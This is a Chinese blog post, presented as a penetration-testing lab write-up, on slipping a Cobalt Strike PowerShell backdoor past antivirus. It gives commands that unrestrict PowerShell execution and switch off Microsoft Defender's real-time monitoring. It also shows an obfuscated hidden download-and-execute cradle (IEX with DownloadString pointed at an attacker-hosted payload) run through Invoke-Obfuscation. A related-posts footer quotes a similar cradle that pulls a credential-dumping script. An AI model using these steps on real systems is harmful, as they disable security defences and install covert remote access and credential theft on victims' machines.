利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀

最新推荐文章于 2024-05-14 20:08:25 发布
最新推荐文章于 2024-05-14 20:08:25 发布
阅读量742 收藏 16
点赞数 1
分类专栏: 渗透实验 文章标签: 网络安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62239233/article/details/130233643
版权

目录

一、实验内容

二、实验环境

三、实验过程与分析

附invoke-obfuscation的部分操作指令:

前言:记录渗透学习中的实验过程

一、实验内容

1、利用Cobaltstrike生成Powershell恶意脚本,并通过Powershell关闭Microsoft Defender防病毒软件以达到免杀目的

2、利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀
 

二、实验环境

操作环境:Windows10、kali

软件:Cobaltstrike、Invoke-Obfuscation

三、实验过程与分析

1、 利用Cobaltstrike生成Powershell恶意脚本,并通过Powershell关闭Microsoft Defender防病毒软件以达到免杀目的

关闭防病毒软件实时扫描功能——>输入Set-ExecutionPolicy Unrestricted

改变当前的 PowerShell 环境的权限设置(注意,此命令需要在管理员权限的powershell 下运行)

命令解释

- Unrestricted: 允许所有的脚本运行, 但是在运行前会提示是否进行操作

尽管Microsoft Defender提供了禁用杀毒软件的命令,但它受防篡改功能的保护,你只能通过Windows安全应用程序中提供的“病毒和威胁防护”设置来禁用它。

若要禁用防病毒,请关闭“防篡改”,然后使用以下步骤:

Set-MpPreference -DisableRealtimeMonitoring $true

完成这些步骤后,实时防病毒保护将被禁用,直到下次重新启动为止。

2、cs中生成powershell脚本

打开cs,按图示点击

然后生成powershell后门

选择保存路径

文件托管中,选择刚生成的powershell文件

端口选择

成功启动服务

 

2、利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀

先在powershell中执行Set-ExecutionPolicy Unrestricted(预防后面报错)

然后选择输入A(全是)

①接着用PowerShell的import-module命令导入Invoke-Obfuscation模块

②或者先切换到Invoke-Obfuscation的文件夹,然后执行Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation

①②任选一种方法即可

。。。。。。(跳过下面这个无法执行的part)

设置目标脚本文件(出现下图这个红字警告时,.ps1文件大概率已经没啦)

输入set scriptpath C:\Users\XG\Documents\payload.ps1

设置并选择混淆方式

。。。。。。(无法执行的part结束)

前面红字报错的地方,换一条命令输入(这条命令可以成功执行)

set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'

注:这条命令里的80改为自己设置的powershell脚本的端口号

http://x.x.x.x 改为在cs文件托管【成功启动服务】后生成的url地址

然后输入encoding选择编码方式(成功执行!!!)

输出混淆后的脚本

(会自动弹出混淆后的脚本)

附invoke-obfuscation的部分操作指令:

输入back可返回上一级目录

输入undo可撤销上次命令(比如重新指定编码方式的时候,就可以使用)

m0_62239233
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CS powershell免杀
weixin_43899495的博客
02-03 1319
修改原理 1.杀软检测的几个点: Invoke VirtualAlloc kernel32.dll FormBase64String System.dll func_get_proc_address func_get_delegate_type $var_va $var_buffer $var_runme $var_code $x 2.bypass方法: (1)函数名称 将上面过滤的函数名,ascii编码解码后再调用 (2)变量名 修改变量名 改版后代码 把cs生成powershell脚本的shellcod
记一次PowerShell免杀实战
zhangge3663的博客
12-30 1662
最近在玩免杀,发现了一些免杀思路,今天来给大家做个分享,希望可以帮到大家。 0x01 powershell 加载 shellcode 介绍 UNIX 系统一直有着功能强大的壳程序(shell),Windows PowerShell的诞生就是要提供功能相当于UNIX系统的命令行壳程序(例如: sh、bash或csh),同时也内置脚本语言以及辅助脚本程序的工具,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。 powershell具有在硬盘中易绕过,内存中难查杀的特点。一般在后渗透
网络安全最全powershell基础免杀(一)_power进阶免杀(1),2024火爆全网系列
最新发布
2401_84264010的博客
05-14 357
powershell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,PowerShell脚本的文本文件,其文件名需要加上扩展名“.PS1”。PowerShell需要.NET环境的支持,同时支持.NET对象,其可读性、易用性居所有Shell之首。1、在Windows 7以上的操作系统中是默认安装的。2、PowerShell脚本可以运行在内存中,不需要写入磁盘。3、几乎不会触发杀毒软件。4、可以远程执行。
脚本免杀概述
weixin_30249203的博客
09-18 135
手机打字实在在麻烦,所以一些比较简单或太复杂的代码我就不直接提供实例了。 1、不是方法的方法--加注释 加一些规则无用不含特征码的注释。代码略 2、大小写混编 利用VBS忽略大小写 3、 分行与同行混用 利用冒号(:)连接多行代码为一行 4、一行分多行 使用续行符(_)将一行分多行写 5、利用execute函数 复制代码 代码如下: Execute("createobje...
Powershell 免杀过 defender 火绒,附自动化工具
st3pby的博客
02-20 4335
技术交流 关注微信公众号Z20安全团队, 回复加群,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 powershell执行策略修改 1 获取 PowerShell当前执行策略 Get-ExecutionPolicy windows默认配置为Restricted 2 设置执行策略 Set-ExecutionPolicy unrestricted PowerShell通过对安全做过充分考量...
CS结合python3混淆shellcode制作免杀脚本
m0_48108919的博客
03-19 7335
文章参考自:Cobalt Strike免杀操作 - 技术文章 - 90Sec 0x00基础知识 Cobalt Strike简介 Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Shellcode介绍 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软Invoke-Obfuscation-Bypass + PS2EXE 绕过主流
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager...powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump
invoke-atomicredteam:Invoke-AtomicRedTeam是一个PowerShell模块,用于执行[atomics文件夹](https
04-30
Invoke-AtomicRedTeam是一个PowerShell模块,用于执行Red Canary的Atomic Red Team项目的中定义的测试。 “ atomics文件夹”包含定义的每种技术的文件夹。 在每个“ T#”文件夹中,您都会找到一个yaml文件,该文件...
Invoke-Recon:“ Powershell脚本有助于域枚举和快速获胜”-基本上是在pentesteracademy进行“高级红队”实验时编写的
04-11
Powershell脚本是AD枚举的第一步。 Quickwins专注。 因为一遍又一遍地键入相同的Powershell命令很繁琐。 先决条件 Git克隆并运行: git clone --recurse-submodules ...
PowerShell中使用curl(Invoke-WebRequest)的方法教程
01-10
第二,PowerShell允许将几个命令组合起来放到文件里执行,实现文件级的重用,也就是说有脚本的性质;第三,PowerShell能够能够充分利用.Net类型和COM对象,来简单地与各种系统交互,完成各种复杂的、自动化的操作。 ...
虫虫免杀--js脚本免杀工具 免杀经验以及简单的分析
lobenton的路边摊
08-12 2085
 js脚本免杀工具 免杀经验以及简单的分析文章作者:虫虫信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本文所做的实验是以ah.js(冰狐的一个变种,附件中名为"病毒样本.txt")为病毒样本进行的,其他js恶意代码没有测试。由于卡巴斯基对js的查杀力度比较大,再者我本机就安装了卡巴斯基,所以对其有少量额外的分析。菜鸟作品,难登大雅之堂,高手多多指教! ^-^常规的思路就是将
Meteasploit技术
m0_65332604的博客
04-06 2290
在使用Kali操作系统是应注意即使更新源,就像平时及时更新手机APP更新命令如下: apt-get update:只更新软件包的索引源,作用:同步源的软件包的索引信息,从而进行软件更新。 Apt-get upgrade:升级系统上安装的所有软件包,如果失败则保持更新之前的状态。 Apt-get dist-upgrade:升级整个Liunux系统(不仅升级所有已安装的软件包,而且会处理升级过程中可能出现的冲突,在某些情况下,他的部分升级需要人工参与)。 渗透攻击大致步骤: *扫描目标及系统,寻找可用
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 482
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
第六章-10 使用powershell进行免杀
划水的小白白
11-27 595
零、说明 1.说明 本文所有内容仅仅用于信息安全方面技术交流, 请读者切勿用于其他用途!!! 一、 生成power shell 1.1创建监听 我这里创建一个监听,命名为bypass。 1.2生成payload 二、Psimage脚本 2.1原理 简单说,将刚刚生成的代码放到图片里。有点类似图片马。 而且图片几乎不会受到什么影响。 2.2图片格式的选择 注意的是,最好图片选择png格式。为什么? 因为将payload存储到这种格式,可以进行无损压缩,且不会影响payload的执行。 但
Powershell免杀系列(二)
st3pby的博客
02-20 3159
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
powershell的一次免杀
Hungchuiho的博客
11-20 4214
powershell介绍 powershell是一个基于.Net的shell和脚本语言,它可以帮助管理员进行一些自动化的操作,Windows 7及以上的操作系统默认安装,同时它是支持跨平台的!一旦攻击者可以在一台计算机 上运行代码,他们就会下载PowerShel脚本文件(.ps1) 到磁盘中执行,甚至无须写到磁盘中执行,它可以直接在内存中运行,可以理解为PowerShell 是 cmd 的加强版。 powershell存在六种执行策略: Unrestricted 权限最高,可以不受限制执行任意脚本 Rest
CS(Cobaltstrike)免杀和使用(附脚本
热门推荐
hackzkaq的博客
07-23 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-hpb1分享! 一.Cobaltstrike简介 作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选 fireeye多次分析过实用cobaltstrike进行apt的案例。 Cobaltstrike安装 CS需要一个服务器来进行,我们把它放到服务器上。 然后运行./teaserver ip 密码即可。 然后使用CS客户端连接即可,输入对应ip、端口和密码。
[原创]CobaltStrike & Metasploit Shellcode一键免杀工具
weixin_30686845的博客
01-12 1505
CobaltStrike & Metasploit Shellcode一键免杀工具 作者: K8哥哥 图片 1个月前该工具生成的exe免杀所有杀软,现在未测应该还能过90%的杀软吧。 可选.net版本为系统安装对应版本,1.0仅支持.net EXE生成。 后续版本不一定公开,望大家见谅,有兴趣的自行反编译生成的exe就知道怎么弄了。 注意: 一定要使用无后门特征的C...
如何下载Invoke-Obfuscation
04-06
1. 打开GitHub页面:...5. 在PowerShell窗口中输入“Import-Module .\Invoke-Obfuscation.psd1”,按回车键进行加载。 6. 下载完成,可以开始使用Invoke-Obfuscation

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值